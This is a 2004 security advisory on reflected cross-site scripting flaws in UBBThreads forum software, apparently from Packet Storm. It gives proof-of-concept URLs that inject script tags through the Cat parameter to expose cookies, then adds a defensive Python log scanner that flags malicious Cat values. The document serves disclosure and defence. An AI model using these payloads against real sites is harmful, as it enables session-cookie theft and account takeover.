ubbXSS.txt

๐Ÿ—“๏ธย 30 Dec 2004ย 00:00:00Reported byย Packet StormTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 16ย Views

UBBThreads has vulnerabilities in versions 6.2.3 and 6.5 allowing session cookie theft.

`Vendor: Infopop  
URL: http://www.infopop.com/  
tested Versions: 6.2.3 & 6.5  
remote: yes  
vendor notified: 06 Dec 2004 at 01:08 AM  
Vendor response: 06/07 Dec 2004 01:33 AM/06:08 PM  
Update status: ..in process  
  
  
============================================================  
  
  
  
Summary:  
~~~~~~~  
UBBThreads is a high-end forum system, powered by  
PHP and MySQL with many attitude.  
A security vulnerability in both products (6.2.3 & 6.5)  
allows malicious users to steal session cookies;  
more versions are probably vulnerable.  
============================================================  
  
  
  
Examples in Version 6.2.3:  
~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
[forum]/showflat.php?Cat=document.write(unescape("%3CSCRIPT%3Ealert%28document.domain%29%3B%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28document.cookie%29%3B%3C/SCRIPT%3E%0D%0A"));  
  
Tested modules are:  
main, search, newuser, login, online, faq, etc.  
  
  
Note:  
~~~~  
Some of these were fixed in Version 6.5.  
Those not fixed follow.  
============================================================  
  
  
  
Examples in version 6.5:  
~~~~~~~~~~~~~~~~~~~~~~~~  
  
[forum]/calendar.php?Cat=document.write(unescape("%3CSCRIPT%3Ealert%28document.domain%29%3B%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28document.cookie%29%3B%3C/SCRIPT%3E%0D%0A"));  
  
  
[forum]/login.php?Cat=[XSS(s.a.)]  
  
and:  
[forum]/online.php?Cat=[XSS(s.a.)]  
  
  
  
============================================================  
  
  
  
Vendor:  
~~~~~  
Vulnerabilities will be fixed in the next release,  
Version 6.5.1. Since March 2004, Infopop no longer offers  
support for any version of UBB.classic or UBB.threads  
prior to Version 6.0.  
  
http://www.infopop.com/  
http://www.ubbcentral.com/  
  
  
  
============================================================  
  
Credits:  
~~~~~  
dw.; ms.; etc.  
  
  
--   
kind regards  
g@cat <-> MM  
  
  
`
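
A defender-side check for the requests described in the advisory, as an added example that is not part of the original advisory or of the vendor's code: it scans access-log lines for requests to the named scripts whose `Cat` value falls outside an allow-list. The allow-list (digits and commas only), the combined log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Scripts the advisory names as reflecting the Cat parameter.
WATCHED = {"showflat.php", "calendar.php", "login.php", "online.php"}
# Assumption: a legitimate Cat value is empty or a comma-separated list of numeric ids.
CAT_OK = re.compile(r"[0-9,]*")
# Request field of a combined-format access-log line: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Dec/2004:10:00:01 +0000] '
    '"GET /forum/showflat.php?Cat=1,2 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [30/Dec/2004:10:00:07 +0000] '
    '"GET /forum/calendar.php?Cat=%3CSCRIPT%3Ealert%28document.domain%29%3B%3C/SCRIPT%3E HTTP/1.1" 200 4831',
    '192.0.2.10 - - [30/Dec/2004:10:00:09 +0000] '
    '"GET /forum/online.php?Cat= HTTP/1.1" 200 2210',
    # Double-encoded variant: one decoding pass still leaves a non-numeric value.
    '192.0.2.44 - - [30/Dec/2004:10:00:12 +0000] '
    '"GET /forum/login.php?Cat=document.write(unescape(%22%253Cb%253E%22)) HTTP/1.1" 200 3017',
]


def flag_requests(log_lines):
    """Return (client, script, decoded Cat) for requests whose Cat fails the allow-list."""
    hits = []
    for line in log_lines:
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        script = url.path.rsplit("/", 1)[-1]
        if script not in WATCHED:
            continue
        # parse_qs percent-decodes each value once before the check.
        for value in parse_qs(url.query, keep_blank_values=True).get("Cat", []):
            if not CAT_OK.fullmatch(value):
                hits.append((line.split(" ", 1)[0], script, value))
    return hits


if __name__ == "__main__":
    for client, script, value in flag_requests(SAMPLE_LOG):
        print(f"{client} {script} Cat={value!r}")
```

Because the check is an allow-list, it flags any non-numeric `Cat` value regardless of how the markup is encoded; the same pattern can be enforced server-side before the parameter is used.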
